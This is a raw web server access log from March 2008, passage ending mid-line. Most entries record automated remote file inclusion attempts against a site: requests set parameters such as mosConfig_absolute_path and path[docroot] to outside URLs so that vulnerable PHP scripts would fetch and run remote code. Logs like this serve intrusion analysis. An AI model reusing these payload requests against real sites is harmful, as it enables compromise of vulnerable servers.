160.99.12.231 - - [23/Mar/2008:20:56:51 -0700] "GET /?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 200 919 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
160.99.12.231 - - [23/Mar/2008:20:56:51 -0700] "GET /logs/?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 200 4513 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
69.61.37.111 - - [23/Mar/2008:20:57:25 -0700] "GET /logs/access.log/?mosConfig_absolute_path=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.36.208.178 - - [23/Mar/2008:20:58:18 -0700] "GET /logs/access_080224.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/temp0r/prodiscminidvdriw01.jpg???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.36.208.178 - - [23/Mar/2008:20:58:18 -0700] "GET /logs/access_080224.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.36.208.178 - - [23/Mar/2008:20:58:18 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.36.208.178 - - [23/Mar/2008:20:58:18 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.36.208.178 - - [23/Mar/2008:20:58:26 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/temp0r/prodiscminidvdriw01.jpg???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.36.208.178 - - [23/Mar/2008:20:58:27 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/temp0r/prodiscminidvdriw01.jpg???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.36.208.178 - - [23/Mar/2008:20:58:27 -0700] "GET /logs/access_080225.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
160.99.12.231 - - [23/Mar/2008:20:58:33 -0700] "GET /logs/access.log/?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
72.36.208.178 - - [23/Mar/2008:20:58:46 -0700] "GET /logs/access_080225.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/temp0r/prodiscminidvdriw01.jpg???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.249.72.194 - - [23/Mar/2008:20:59:04 -0700] "GET /logs/access_080225.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.toulouseangloexchange.com"
66.249.72.194 - - [23/Mar/2008:21:00:20 -0700] "GET /logs/access_080303.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.toulouseangloexchange.com"
72.32.209.240 - - [23/Mar/2008:21:00:55 -0700] "GET //index.php?headfoot=yes&path[docroot]=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
72.32.209.240 - - [23/Mar/2008:21:00:55 -0700] "GET /logs//index.php?headfoot=yes&path[docroot]=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
72.21.54.146 - - [23/Mar/2008:21:01:00 -0700] "GET //index.php?headfoot=yes&path[docroot]=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.toulouseangloexchange.com"
72.21.54.146 - - [23/Mar/2008:21:01:00 -0700] "GET /logs//index.php?headfoot=yes&path[docroot]=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.toulouseangloexchange.com"
64.13.224.85 - - [23/Mar/2008:21:01:31 -0700] "GET /logs//index.php?headfoot=yes&path[docroot]=http://www.tovr.com/images/id.gif??